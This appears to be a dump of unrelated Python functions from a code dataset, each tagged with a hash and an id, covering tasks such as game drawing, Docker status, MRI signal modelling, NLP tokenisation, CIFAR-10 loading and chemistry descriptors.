return y_test_actual, y_test_actual_descaled, predictions, y_pred, this_model_name | 53f4b9b725a6c3fe5693b553f91e755cf950ebd8 | 3,628,452 |
import math
def aline(x: int, y: int, length: int, col: int, angle: int = 0) -> [int, int]:
"""
Draws a angled line. Because lazy math
:param x: start X position
:param y: start Y position
:param length: length of the line in pixels
:param col: colour as integer, see pyxel for that
:param angle: angle of the line in degree. Use 0 for a horizontal line towards right
:return:
:see
:example:
aline(50, 50, 20, pyxel.COLOR_WHITE, 90)
"""
x2, y2 = int(x + length * math.cos(angle * math.pi / 180)), int(y + length * math.sin(angle * math.pi / 180))
pyxel.line(x, y, x2, y2, col)
return x2, y2 | 0220b6d0ffabb3b8f238efa3cb157a13dd3e1777 | 3,628,453 |
import logging
def ps_(project):
"""
containers status
"""
logging.info('ps ' + project.name)
running_containers = project.containers(stopped=True)
items = [{
'name': container.name,
'name_without_project': container.name_without_project,
'command': container.human_readable_command,
'state': container.human_readable_state,
'labels': container.labels,
'ports': container.ports,
'volumes': get_volumes(get_container_from_id(project.client, container.id)),
'is_running': container.is_running} for container in running_containers]
return items | 7fe4da390105b29477d4903bc7cb292b1e2ccbc6 | 3,628,454 |
def _GetRegionalSetRequest(client, health_check_ref, replacement):
"""Returns a request for updating the health check."""
return (client.apitools_client.regionHealthChecks, 'Update',
client.messages.ComputeRegionHealthChecksUpdateRequest(
healthCheck=health_check_ref.Name(),
healthCheckResource=replacement,
project=health_check_ref.project,
region=health_check_ref.region)) | ec47ac791fcf912ba7c05077b34f2f62e0949691 | 3,628,455 |
def select_conf(query_message):
"""
Have the user select from a list of all domains with enabled vhost files.
Args:
query_message - The message to display to the user in the prompt
"""
files = enabled_sites()
questions = [
inquirer.List('f',
message=query_message,
choices=files
)
]
conf_file = inquirer.prompt(questions)['f']
return conf_file | f4e61bc6a5a41bf26cdde853903101babd0eb06d | 3,628,456 |
def load_8_color_sim(measurements, time, thresholds, remove_edges=True, data=False, start_n = 13, end_n = 46, ignore=[22]):
"""
"""
num_frames = len(measurements)
data_dict = load_ME_sim(measurements, time, thresholds, center_only=True, remove_edges=False, direction='horizontal')
k_hat_data = load_8_color(data_dict, frames=range(num_frames), remove_edges=remove_edges, data=data,
start_n=start_n, end_n=end_n, ignore=ignore)
return k_hat_data | 53348717952b62e7c51307e8070342a4b426c53e | 3,628,457 |
def service_delete_route(service_id):
"""delete service"""
form = ButtonForm()
if form.validate_on_submit():
service = Service.query.get(service_id)
db.session.delete(service)
db.session.commit()
return redirect(url_for('storage.host_view_route', host_id=service.host_id))
return render_template('button-delete.html', form=form) | e4f7e30c2f5755252451115f06e5a12f7374b26c | 3,628,458 |
def setVariable(name, value):
"""
Assign a variable in scope. name = value
:type name: string
:param name: name of variable to set
:type value: varies
:param value: value to set. May be a basic type (string, int) or an object
"""
return CONTEXT.scope.setValue(name, value) | 7979e3b63dc41bfcdc3ccac10edc1f2c4dd6ebbe | 3,628,459 |
def HighFlowSingleInletGadoxetate2DSPGR_Rat(xData2DArray, Ve, Kbh, Khe,
constantsString):
"""This function contains the algorithm for calculating
how MR signal from a 2D scan varies with time using the
High Flow Single Inlet Two Compartment Gadoxetate Model model.
Input Parameters
----------------
xData2DArray - time and AIF concentration 1D arrays
stacked into one 2D array.
Ve - Plasma Volume Fraction (decimal fraction).
Khe - Hepatocyte Uptake Rate (mL/min/mL)
Kbh - Biliary Efflux Rate (mL/min/mL)
constantsString - String representation of a dictionary
of constant name:value pairs used to convert concentrations
predicted by this model to MR signal values.
Returns
-------
St_rel - list of calculated MR signals at each of the
time points in array 'time'.
"""
try:
exceptionHandler.modelFunctionInfoLogger()
t = xData2DArray[:,0]
Sa = xData2DArray[:,1]
# Unpack SPGR model constants from
# a string representation of a dictionary
# of constants and their values
constantsDict = eval(constantsString)
TR, baseline, FA, r1, R10a, R10t = \
float(constantsDict['TR']), \
int(constantsDict['baseline']),\
float(constantsDict['FA']), float(constantsDict['r1']), \
float(constantsDict['R10a']), float(constantsDict['R10t'])
# Convert to concentrations
# n_jobs set to 1 to turn off parallel processing
# because parallel processing caused a segmentation
# fault in the compiled version of this application.
# This is not a problem in the uncompiled script
R1a = [Parallel(n_jobs=1)(delayed(fsolve)
(tools.spgr2d_func, x0=0,
args = (r1, FA, TR, R10a, baseline, Sa[p]))
for p in np.arange(0,len(t)))]
R1a = np.squeeze(R1a)
ca = (R1a - R10a)/r1
# Correct for spleen Ve
ve_spleen = 0.43
ce = ca/ve_spleen
if Kbh != 0:
Th = (1-Ve)/Kbh
ct = Ve*ce + Khe*Th*tools.expconv(Th,t,ce, 'HighFlowSingleInletGadoxetate2DSPGR_Rat')
else:
ct = Ve*ce + Khe*tools.integrate(ce,t)
# Convert to signal
St_rel = tools.spgr2d_func_inv(r1, FA, TR, R10t, ct)
#Return tissue signal relative to the baseline St/St_baseline
return(St_rel)
except ZeroDivisionError as zde:
exceptionHandler.handleDivByZeroException(zde)
except Exception as e:
exceptionHandler.handleGeneralException(e) | 4b856e9aa0209ab6e92232b42c7c6b8e029672d1 | 3,628,460 |
def to_nltk_tokens(
df,
sentence_cols=["sentence1", "sentence2"],
token_cols=["sentence1_tokens", "sentence2_tokens"],
):
"""
This function converts a sentence to word tokens using nltk.
Args:
df (pd.DataFrame): Dataframe with columns sentence_cols to tokenize.
sentence_cols (list, optional): Column names for the raw sentences.
token_cols (list, optional): Column names for the tokenized sentences.
Returns:
pd.DataFrame: Dataframe with new columns token_cols, each containing a
list of tokens for their respective sentences.
"""
text_df = df[sentence_cols]
tok_df = text_df.applymap(lambda sentence: nltk.word_tokenize(sentence))
tok_df.columns = token_cols
tokenized = pd.concat([df, tok_df], axis=1)
return tokenized | 310095ba481376fe3c58c9d09c10a89793e4cd27 | 3,628,461 |
def problems(mod, msg):
"""Ansible module exist with an error."""
return mod.exit_json(changed=False, failed=True, msg=msg) | 3ec1a8c8843ba9b33d47e61d1b775aadb32ab45e | 3,628,462 |
def to_sql_name(name):
"""
Ensure ``name`` is a valid SQL name.
"""
return name.lower().replace(' ', '_') | f3157d9444793d0af05e27317fdab2aa55531b84 | 3,628,463 |
import os
import json
def get_setting(key):
"""Get the secret variable or return explicit exception."""
try:
base_dir = str(os.path.dirname(__file__))
print("BASE DIR: " + base_dir)
with open(base_dir.join("/config.json")) as f:
config_json = json.loads(f.read())
return config_json[key]
except KeyError:
error_msg = "Set the {0} environment variable".format(key)
raise KeyError(error_msg)
except Exception as e:
raise Exception("Some error occurred: ", e) | 20cae220942c087f3d372444399f79e68aa49263 | 3,628,464 |
def natural_breaks(values, k=5, init=10):
"""
natural breaks helper function
Jenks natural breaks is kmeans in one dimension
Parameters
----------
values : array
(n, 1) values to bin
k : int
Number of classes
init: int, default:10
Number of different solutions to obtain using different centroids. Best solution is returned.
"""
values = np.array(values)
uv = np.unique(values)
uvk = len(uv)
if uvk < k:
Warn(
"Warning: Not enough unique values in array to form k classes", UserWarning
)
Warn("Warning: setting k to %d" % uvk, UserWarning)
k = uvk
kres = _kmeans(values, k, n_init=init)
sids = kres[-1] # centroids
fit = kres[-2]
class_ids = kres[0]
cuts = kres[1]
return (sids, class_ids, fit, cuts) | 86373c0f43eddb15fb3fab75a27f0e1270f2c359 | 3,628,465 |
def _get_base_code_module(builder_name: tfds.core.naming.DatasetName) -> str:
"""Find the code location of the requested dataset."""
builder_name = str(builder_name)
module_path = utils.sunds_dir() / 'datasets'
if (module_path / builder_name).exists():
return f'sunds.datasets.{builder_name}'
else:
raise ValueError(f'Could not find dataset code for {builder_name}') | d169465d9dcca94d274e4ff09653aa591692ada6 | 3,628,466 |
def polygon_to_points( poly ):
"""
Plotting helper, which rearranges polygon vertices into lists
of X and Y coordinates. The first point is duplicated at the end
of each list, to make a closed path.
:Parameters:
poly: tuple of ((x1,y1),(x2,y2),...)
The coordinates of the vertices of the polygon.
:Returns:
(xlist, ylist): list of 2 tuples
((x1, x2, ..., x1), (y1, y2, ..., y1))
"""
xlist = []
ylist = []
for vertex in poly:
xlist.append(vertex[0])
ylist.append(vertex[1])
xlist.append(xlist[0])
ylist.append(ylist[0])
return (xlist, ylist) | 958621cb7ff2d4fe22c4482e07a6a7ba614f9fc1 | 3,628,467 |
def make_headers(worksheet):
"""
Make headers from worksheet
"""
headers = {}
cell_idx = 0
while cell_idx < worksheet.ncols:
cell_type = worksheet.cell_type(0, cell_idx)
if cell_type == 1:
header = slughifi(worksheet.cell_value(0, cell_idx))
if not header.startswith("_"):
headers[cell_idx] = header
cell_idx += 1
return headers | fb5f66e4d0cc931dcf6ccbb8848244cd4483498f | 3,628,468 |
import re
def alphanumerical(string):
"""
A function to filter a string to only allow alphanumerical characters.
"""
pattern = re.compile('[^a-zA-Z0-9]+')
return pattern.sub('', string) | 3acd64f629e601c72421ac73955a61c1426d3a9d | 3,628,469 |
from typing import Tuple
def _avgpool2d_im2col_reduce(
x: AbstractTensor,
pool_size: Tuple[int, int],
strides: Tuple[int, int],
padding: str,
) -> AbstractTensor:
"""Perform 2D average pooling by the im2col method."""
batch, channels, height, width = x.shape
pool_height, pool_width = pool_size
if padding == "SAME":
out_height = ceil(int(height) / strides[0])
out_width = ceil(int(width) / strides[1])
else:
out_height = ceil((int(height) - pool_size[0] + 1) / strides[0])
out_width = ceil((int(width) - pool_size[1] + 1) / strides[1])
x_split = x.reshape((batch * channels, 1, height, width))
x_cols = x_split.im2col(pool_height, pool_width, padding, strides[0])
x_cols_sum = x_cols.reduce_sum(axis=0)
out = x_cols_sum.reshape([out_height, out_width, batch, channels]).transpose(
[2, 3, 0, 1],
)
return out | 123377c9d6dfcdaaf874c47156b0cdb177fbf126 | 3,628,470 |
def helper_parse_UniProt_dump_other_functions(list_of_string):
"""
e.g. input
[['EMBL; AY548484; AAT09660.1; -; Genomic_DNA.'],
['RefSeq; YP_031579.1; NC_005946.1.'],
['ProteinModelPortal; Q6GZX4; -.'],
['SwissPalm; Q6GZX4; -.'],
['GeneID; 2947773; -.'],
['KEGG; vg:2947773; -.'],
['Proteomes; UP000008770; Genome.'],
['GO; GO:0046782; P:regulation of viral transcription; IEA:InterPro.'],
['InterPro; IPR007031; Poxvirus_VLTF3.'],
['Pfam; PF04947; Pox_VLTF3; 1.']]
EnsemblPlants; AT3G09880.1; AT3G09880.1; AT3G09880.
"""
# GO, InterPro, Pfam, KEGG, Reactome, STRING, Proteomes = [], [], [], [], [], [], []
GO, InterPro, Pfam, Reactome = [], [], [], []
for row in list_of_string:
row_split = row.split(";")
func_type = row_split[0]
try:
annotation = row_split[1].strip()
except IndexError:
continue
# if func_type == "KEGG":
# KEGG.append(annotation)
if func_type == "GO":
GO.append(annotation)
elif func_type == "InterPro":
InterPro.append(annotation)
elif func_type == "Pfam":
Pfam.append(annotation)
elif func_type == "Reactome": # DR Reactome; R-DME-6799198; Complex I biogenesis.
if annotation.startswith("R-"): # R-DME-6799198 --> DME-6799198
annotation = annotation[2:]
Reactome.append(annotation)
# elif func_type == "STRING":
# funcs_2_return = []
# try:
# for func in [func.strip() for func in row_split[1:]]:
# if func.endswith("."):
# func = func[:-1]
# if func == "-":
# continue
# funcs_2_return.append(func)
# except IndexError:
# continue
# STRING += funcs_2_return
# elif func_type == "Proteomes":
# Proteomes.append(annotation)
# return [GO, InterPro, Pfam, KEGG, Reactome, STRING, Proteomes]
return GO, InterPro, Pfam, Reactome | 292cd9eca3636ba3cd6813df574de3bdd54aa48f | 3,628,471 |
import numpy
def normalise_signal_minmax(signal: numpy.ndarray) -> numpy.ndarray:
""" """
return numpy.interp(signal, (signal.min(), signal.max()), (-1, 1)) | 266cb3c86fa5f48c997bb8f18e42cc38b2d05d7e | 3,628,472 |
import json
import logging
def main(request):
"""HTTP Cloud Function.
Args:
request (flask.Request): The request object.
Returns:
The response text, or any set of values that can be turned into a
Response object using `make_response`
<http://flask.pocoo.org/docs/0.12/api/#flask.Flask.make_response>.
"""
group_name = ""
event_id = ""
# Retrieve creds
client = storage.Client()
bucket = client.get_bucket('gcpug-meetup-files')
blob = bucket.get_blob('config/config.json')
keys = blob.download_as_string()
keys_json = json.loads(keys)
# Retrieve slack channel id
slack_token = keys_json['slack_token']
slack_channel_name = keys_json['slack_channel_name']
channel_id = slack.get_channel_list(slack_token, slack_channel_name)
text_value = request.form.get('text')
logging.info("Text_Value: %s" % (text_value))
try:
if text_value is None or text_value == "":
logging.info("No Group name passed in")
else:
split_text = text_value.split(" ")
if len(split_text) == 1:
group_name = split_text[0]
event_id = meetup.get_latest_upcoming_event(group_name)
else:
group_name = split_text[0]
event_id = split_text[1]
except ValueError as e:
logging.error(e)
slack.send_text_to_channel(
slack_token, channel_id, "Group name is unavailable. Please check again")
return "error"
except Exception as e:
logging.error(e)
slack.send_text_to_channel(
slack_token, channel_id, "Error in retrieving stats. Check logs")
return "error"
# TODO: Move default channel to a config file
if group_name == "":
group_name = "GCPUGSG"
if event_id == "":
event_id = "251921227"
meetup.get_rsvps(group_name, event_id)
slack.upload_image_to_channel(slack_token, channel_id,
"/tmp/test.png")
return 'test v5!' | 714379f52a5cc9adcdcb9f5195316a58558757ca | 3,628,473 |
from typing import List
from typing import Tuple
import statistics
def znormalizeSpeakerData(
featureTimeList: List[Tuple[float, ...]], index: int, filterZeroValues: bool
) -> List[Tuple[float, ...]]:
"""
znormalize time series data
The idea is to normalize each speaker separately to be able
to compare data across several speakers for speaker-dependent
data like pitch range
To normalize a speakers data within a local window, use filterTimeSeriesData()
filterZeroValues: if True, don't consider zero values in the mean and stdDev
(recommended value for data like pitch or intensity)
"""
featValues = [row[index] for row in featureTimeList]
if not filterZeroValues:
featValues = znormalizeData(featValues)
else:
featValuesNoZeroes = [val for val in featValues if val != ""]
meanVal = statistics.mean(featValuesNoZeroes)
stdDevVal = statistics.stdev(featValuesNoZeroes)
featValues = [
(val - meanVal) / stdDevVal if val > 0 else 0 for val in featValues
]
if len(featureTimeList) != len(featValues):
errors.ArgumentError(
"The length of the time values {len(featureTimeList)} does not "
"match the length of the data values {len(featValues)}"
)
outputList = [
tuple([*piRow[:index], val, *piRow[index + 1 :]])
for piRow, val in zip(featureTimeList, featValues)
]
return outputList | 67978c7118f5e7645913d9bc79b5fb3726cbc217 | 3,628,474 |
import os
def parallel():
"""
Returns 'mpi', if this code runs with MPI, else returns 'seq'
:return:
"""
return 'mpi' if 'OMPI_COMM_WORLD_SIZE' in os.environ else 'seq' | 7a5212a1b563f2bd95130ee6b6381397a4ef2edd | 3,628,475 |
def only_float(val):
"""Pass input val value or array only if it is a float.
:param val: value to be evaluated
:returns: evaluated value
:rtype: np.float64 or np.ndarray
"""
if isinstance(val, (np.float64, float)):
return val
elif hasattr(val, "__iter__") and not isinstance(val, str):
return np.asarray(
[s if isinstance(s, (np.float64, float)) else np.nan for s in val]
)
return np.nan | ba097f39047c55065dd5b3189ce54a3bb89151a7 | 3,628,476 |
def dcos_ca_bundle():
"""
Retrieve DC/OS CA bundle and returns the content.
"""
return transport_encryption.fetch_dcos_ca_bundle_contents().decode("ascii") | ae383804c2b91691564d595696904b6d498bff81 | 3,628,477 |
def slr_range_bias(dset):
"""Calculate the partial derivative of the measurement with respect to range bias.
Args:
data: A Dataset containing model data.
Returns:
Tuple: Array of partial derivatives, and list of names of derivatives
"""
# Check if stations to estimate for actually has data
# this step might be unnecessary, since this is done somwhere else?
stations = np.asarray(dset.unique("station"))
stations_to_estimate_for = dset.station[np.asarray(dset.estimate_range, dtype=bool)]
stations_idx = np.in1d(stations, stations_to_estimate_for)
stations = stations[stations_idx]
# Set up the partials of measurement with respect to range bias, which is 1 if station
# is involved in the measurement, otherwise zero.
partials = np.zeros((dset.num_obs, len(stations)))
for site_idx, station in enumerate(stations):
idx = dset.filter(station=station)
partials[idx, site_idx] = 1
column_names = [s for s in stations]
return partials, column_names, "dimensionless" | d02c21366d8d6e516391d82a51da8f4748dcfa70 | 3,628,478 |
def calc_cond_hf(data: h5py.File, direction: str='full'):
"""Calculate the conductive heat flow for the whole model cube in x, y, z direction
Args:
data (h5py.File): HDF5 file with simulated variables
direction (str, optional): string to return either full (x,y,z) heat flow, or just one direction.
x returns just in x-direction, y just in y-direction, z just in z-direction. Defaults to 'full'.
Returns:
[np.ndarray]: array with the heat flow in the specified direction, or the full. then the method returns three variables,
one for each direction.
"""
dz = data['delz'][:,:,:]
dy = data['dely'][:,:,:]
dx = data['delx'][:,:,:]
temp_diff = np.gradient(data['temp'][:,:,:])
tdx = temp_diff[2]/dx
tdy = temp_diff[1]/dy
tdz = temp_diff[0]/dz
qx = -data['lx'][:,:,:] * tdx
qy = -data['ly'][:,:,:] * tdy
qz = -data['lz'][:,:,:] * tdz
if direction=='full':
return qx, qy, qz
elif direction=='x':
return qx
elif direction=='y':
return qy
elif direction=='z':
return qz | dc83ef46daaa91384a8791eb2bac6117064c3853 | 3,628,479 |
def decode_dbkey(dbkey):
""" Decodes dbkey and returns tuple ( username, dbkey )"""
if isinstance(dbkey, str) and ':' in dbkey:
return dbkey.split(':')
else:
return None, dbkey | de2a076b36e4ea82412478384b65845af225b1ab | 3,628,480 |
def get_case_related_entities(st, related_cases):
"""Returns the all the entities featured in the related cases without duplicates.
INPUT: Storage unit, related cases.
OUTPUT: All the entities and their types contained in the related cases without duplicates"""
existing_ners = {}
for c in related_cases:
case_ents = st.get_case_entities(c)
ents = {}
for k, v in case_ents.items():
ents.update(v)
if not set(existing_ners) & set(ents):
for k, e in ents.items():
existing_ners[k] = e
return existing_ners | 7ecc8927720a22d5dc05c948b9abbae458aee426 | 3,628,481 |
def create_view(request):
""" Takes a http request and renders a page for creating a Hub.
"""
if(request.method == 'POST'):
form = HubCreateForm(request.POST)
# Check if the form is valid:
if form.is_valid():
queryset_hub = Hub.objects.filter(seller_name=request.user.username)
for h in queryset_hub:
if h.name == request.user.username + '/' + form.cleaned_data['name']:
form = HubCreateForm()
context = {
'form' : form,
}
return render(request, 'hubs/hub_create.html', context)
''' create a hub instance, add username and save to database '''
instance = Hub()
instance.seller_name = request.user.username
instance.name = request.user.username + '/' + form.cleaned_data['name']
instance.private = form.cleaned_data['private']
instance.save()
return HttpResponseRedirect(reverse('hubs:list') )
form = HubCreateForm()
context = {
'form' : form,
}
return render(request, 'hubs/hub_create.html', context) | 2552acd9995f5fb10f1c5cb639e21cc37a887aec | 3,628,482 |
async def async_setup(hass, config):
"""Start the Fortigate component."""
conf = config[DOMAIN]
host = conf[CONF_HOST]
user = conf[CONF_USERNAME]
api_key = conf[CONF_API_KEY]
devices = conf[CONF_DEVICES]
is_success = await async_setup_fortigate(
hass, config, host, user, api_key, devices
)
return is_success | 29d9e3049f5bb45ad9b85eaf39e25e517871eaf6 | 3,628,483 |
import random
def get_documents_words(news_files, corpus_news):
"""
Given a set of documents it will return the dictionary with their
respective categories
:param news_files: List of raw news file names
:param corpus_news: PlainTextCorpusReader object
:return: Dictionary with words and categories associated
"""
root = corpus_news.root
news = []
for file in news_files:
category = file.split('/')[-1].split('--')[0]
file_name = file.replace(root, '', 1)
words = corpus_news.words(file_name[1:])
news.append((list(words), category))
random.shuffle(news)
return news | ad189bf0e00118bebbb21794d959d903242ca10c | 3,628,484 |
def process(ele):
"""reshape 'dtce' and 0-1 normalizes it"""
ele['dtce'] = tf.reshape(ele['dtce'], [ele['height'], ele['width']])
ele['dtce'] = (ele['dtce'] - tf.reduce_min(ele['dtce']))/(tf.reduce_max(ele['dtce']) - tf.reduce_min(ele['dtce']))
return ele | 8ed6f643e177834898619295c293c1b0a169fae1 | 3,628,485 |
def get_CIFAR10_data(cifar10_dir, num_training=49000, num_validation=1000, num_test=1000,
subtract_mean=True):
"""
Load the CIFAR-10 dataset from disk and perform preprocessing to prepare
it for classifiers.
"""
# Load the raw CIFAR-10 data
X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)
# Subsample the data
mask = list(range(num_training, num_training + num_validation))
X_val = X_train[mask]
y_val = y_train[mask]
mask = list(range(num_training))
X_train = X_train[mask]
y_train = y_train[mask]
mask = list(range(num_test))
X_test = X_test[mask]
y_test = y_test[mask]
# Normalize the data: subtract the mean image
if subtract_mean:
mean_image = np.mean(X_train, axis=0)
X_train -= mean_image
X_val -= mean_image
X_test -= mean_image
# Package data into a dictionary
return {
'X_train': X_train, 'y_train': y_train,
'X_val': X_val, 'y_val': y_val,
'X_test': X_test, 'y_test': y_test,
} | fa90aec774ced080f78dbb7123cd2b873ad28361 | 3,628,486 |
import os
import traceback
import sys
def getEmoji(aCountry):
"""
Get country emoji
"""
bEmoji = ""
try:
if aCountry in Config.dCountryCodes:
bEmoji = flag.flagize(":%s:" % (Config.dCountryCodes[aCountry]))
except Exception:
myLogger.exception(
"Exception in [file: %s | module: %s | line: %s]: %s",
os.path.basename(traceback.extract_stack()[-1][0]),
traceback.extract_stack()[-1][2],
traceback.extract_stack()[-1][1],
sys.exc_info()[1],
)
return None
return bEmoji | 60dab71b02c2bf582a9d104a285086b396147bcf | 3,628,487 |
def response_for_created_event(event, status_code):
"""
Method returning the response when an event has been successfully created.
:param status_code:
:param event: Event
:return: Http Response
"""
return make_response(jsonify({'event' : {
'event_id': event.event_id,
'event_name': event.event_name,
'event_location': event.event_location,
'event_eval_link': event.event_eval_link,
'event_time': event.event_time,
'created_on': event.event_created_on,
'modified_on': event.event_updated_on
}, 'status': 'success'})), status_code | 1b86d011aa3a564d4b06018bfadd1992ce8c8515 | 3,628,488 |
import time
import numpy
def weightedLeastSquares(X, Y, W):
"""
solve using the normal equations with no manipulation
"""
t0 = time.time()
### check the input
if checkMatrixSizes(X, Y) is False:
return None
### solve it
XTW = numpy.transpose(X)*W
XTWX = numpy.dot(XTW, X)
if numpy.linalg.det(XTWX) == 0:
apDisplay.printWarning("Singular matrix in calculation")
return None
XTWXinv = numpy.linalg.inv(XTWX)
beta = numpy.dot(numpy.dot(XTWXinv, XTW), Y)
#apDisplay.printMsg("weightedLeastSquares completed in %s"
# %(apDisplay.timeString(time.time()-t0)))
return beta | b619e34469abc1260992d0b7f3334e5126a1fbf4 | 3,628,489 |
def question_first_sentence(database_connection, question):
"""
return the id, answer, and first sentence of questions in a set of categories
"""
c = database_connection.cursor()
command = 'select raw from text where question=%i' % question
c.execute(command)
for ii, in c:
return ii | 730e3c3825a47f66418a3c9decbd0e38755b6775 | 3,628,490 |
def help_search():
"""Search help guide."""
# Default to rendering english page if locale page not found.
locale = get_locale()
return render_template([
f"invenio_app_rdm/help/search.{locale}.html",
"invenio_app_rdm/help/search.en.html",
]) | abacb6971dbb5fb126c492e8bad3f859857381d8 | 3,628,491 |
def sum_of_vals(vals):
"""
:param vals: an iterable such as list
:return: sum of the values from the iterable
"""
sum = 0
for val in vals:
sum += val
return sum | aecc28e505acbea02f5ec41aec03b2db7bc3baad | 3,628,492 |
from typing import List
def predict_all_attrs(
img: tf.Tensor, model_list: List[tf.keras.Model]) -> List[np.int32]:
"""Predicts all attributes for a given image."""
pred_list = []
for model in model_list[:-1]:
pred = np.argmax(model(img))
pred_list.append(pred)
pred = np.round(7. * model_list[-1](img) + 7)[0][0]
pred_list.append(pred)
return pred_list | 5c9fa0b238d3959010434b36f80d4eed71202c56 | 3,628,493 |
import re
def recognize_timestamp(line):
"""Handle a timestamp comment line."""
# This is a pukey way to handle this imported constant ...
# I bet there's a better way. Figure it out.
global timestamp_pattern
if re.match(timestamp_pattern, line):
return True
else:
return False | aa23ca09b2c3a24b1541d9f2ca1133ed0907cfa4 | 3,628,494 |
def admin_email_address_has_approved_domain(email_address):
"""
Check the admin's email address is from a whitelisted domain
:param email_address: string
:return: boolean
"""
return email_address.split('@')[-1] in current_app.config.get('DM_ALLOWED_ADMIN_DOMAINS', []) | 3495cbe0292436323d6d2bcfaa35fb91e06d5632 | 3,628,495 |
def get_replica_context() -> ReplicaContext:
"""If called from a deployment, returns the deployment and replica tag.
A replica tag uniquely identifies a single replica for a Ray Serve
deployment at runtime. Replica tags are of the form
`<deployment_name>#<random letters>`.
Raises:
RayServeException: if not called from within a Ray Serve deployment.
Example:
>>> from ray import serve
>>> # deployment_name
>>> serve.get_replica_context().deployment # doctest: +SKIP
>>> # deployment_name#krcwoa
>>> serve.get_replica_context().replica_tag # doctest: +SKIP
"""
internal_replica_context = get_internal_replica_context()
if internal_replica_context is None:
raise RayServeException(
"`serve.get_replica_context()` "
"may only be called from within a "
"Ray Serve deployment."
)
return internal_replica_context | f5c1a4dc207fac167f4179acf91eaa8b7440a0a3 | 3,628,496 |
def stratify(data, classes, ratios, one_hot=False):
"""Stratifying procedure. Borrowed from https://vict0rs.ch/2018/05/24/sample-multilabel-dataset/
data is a list of lists: a list of labels, for each sample.
Each sample's labels should be ints, if they are one-hot encoded, use one_hot=True
classes is the list of classes each label can take
ratios is a list, summing to 1, of how the dataset should be split
"""
# one-hot decoding
if one_hot:
temp = [[] for _ in range(len(data))]
indexes, values = np.where(np.array(data).astype(int) == 1)
for k, v in zip(indexes, values):
temp[k].append(v)
data = temp
# Organize data per label: for each label l, per_label_data[l] contains the list of samples
# in data which have this label
per_label_data = {c: set() for c in classes}
for i, d in enumerate(data):
for l in d:
per_label_data[l].add(i)
# number of samples
size = len(data)
# In order not to compute lengths each time, they are tracked here.
subset_sizes = [r * size for r in ratios]
target_subset_sizes = deepcopy(subset_sizes)
per_label_subset_sizes = {
c: [r * len(per_label_data[c]) for r in ratios]
for c in classes
}
# For each subset we want, the set of sample-ids which should end up in it
stratified_data_ids = [set() for _ in range(len(ratios))]
# For each sample in the data set
while size > 0:
# Compute |Di|
lengths = {
l: len(label_data)
for l, label_data in per_label_data.items()
}
try:
# Find label of smallest |Di|
label = min(
{k: v for k, v in lengths.items() if v > 0}, key=lengths.get
)
except ValueError:
# If the dictionary in `min` is empty we get a Value Error.
# This can happen if there are unlabeled samples.
# In this case, `size` would be > 0 but only samples without label would remain.
# "No label" could be a class in itself: it's up to you to format your data accordingly.
break
current_length = lengths[label]
# For each sample with label `label`
while per_label_data[label]:
# Select such a sample
current_id = per_label_data[label].pop()
subset_sizes_for_label = per_label_subset_sizes[label]
# Find argmax clj i.e. subset in greatest need of the current label
largest_subsets = np.argwhere(
subset_sizes_for_label == np.amax(subset_sizes_for_label)
).flatten()
if len(largest_subsets) == 1:
subset = largest_subsets[0]
# If there is more than one such subset, find the one in greatest need
# of any label
else:
largest_subsets = np.argwhere(
subset_sizes == np.amax(subset_sizes)
).flatten()
if len(largest_subsets) == 1:
subset = largest_subsets[0]
else:
# If there is more than one such subset, choose at random
subset = np.random.choice(largest_subsets)
# Store the sample's id in the selected subset
stratified_data_ids[subset].add(current_id)
# There is one fewer sample to distribute
size -= 1
# The selected subset needs one fewer sample
subset_sizes[subset] -= 1
# In the selected subset, there is one more example for each label
# the current sample has
for l in data[current_id]:
per_label_subset_sizes[l][subset] -= 1
# Remove the sample from the dataset, meaning from all per_label dataset created
for l, label_data in per_label_data.items():
if current_id in label_data:
label_data.remove(current_id)
# Create the stratified dataset as a list of subsets, each containing the orginal labels
stratified_data_ids = [sorted(strat) for strat in stratified_data_ids]
stratified_data = [
[data[i] for i in strat] for strat in stratified_data_ids
]
# Return both the stratified indexes, to be used to sample the `features` associated with your labels
# And the stratified labels dataset
return stratified_data_ids, stratified_data | 7ec0f43992ed4e499c8c1b273c63275d66305c06 | 3,628,497 |
def handle_request(fun):
"""
Exception treatment for the REST API calls
"""
def wrapper(self, *args, **kwargs):
"""
We raise an exception when
the code on the client side fails
Server side errors are taken care of
through response codes
"""
try:
return fun(self, *args, **kwargs)
except Exception as req_exception:
self.logger.exception("internal error")
raise ClientSideError(str(req_exception))
return wrapper | ff03fdfa27c121c9015b41768ed3a9de6ec2fa41 | 3,628,498 |
from rdkit.ML.Descriptors import MoleculeDescriptors
from rdkit import Chem
from rdkit.Chem import Descriptors
def compDesc(smiles):
"""
:param smiles:
:return:
"""
descriptors = list(np.array(Descriptors._descList)[:, 0])
calculator = MoleculeDescriptors.MolecularDescriptorCalculator(descriptors)
try:
cansmi = _cansmi(smiles)
mol = Chem.MolFromSmiles(cansmi)
res = calculator.CalcDescriptors(mol)
except:
res = None
return res | 2f115fc922e3b9e5e41fd0a305be5c0c16c338f4 | 3,628,499 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.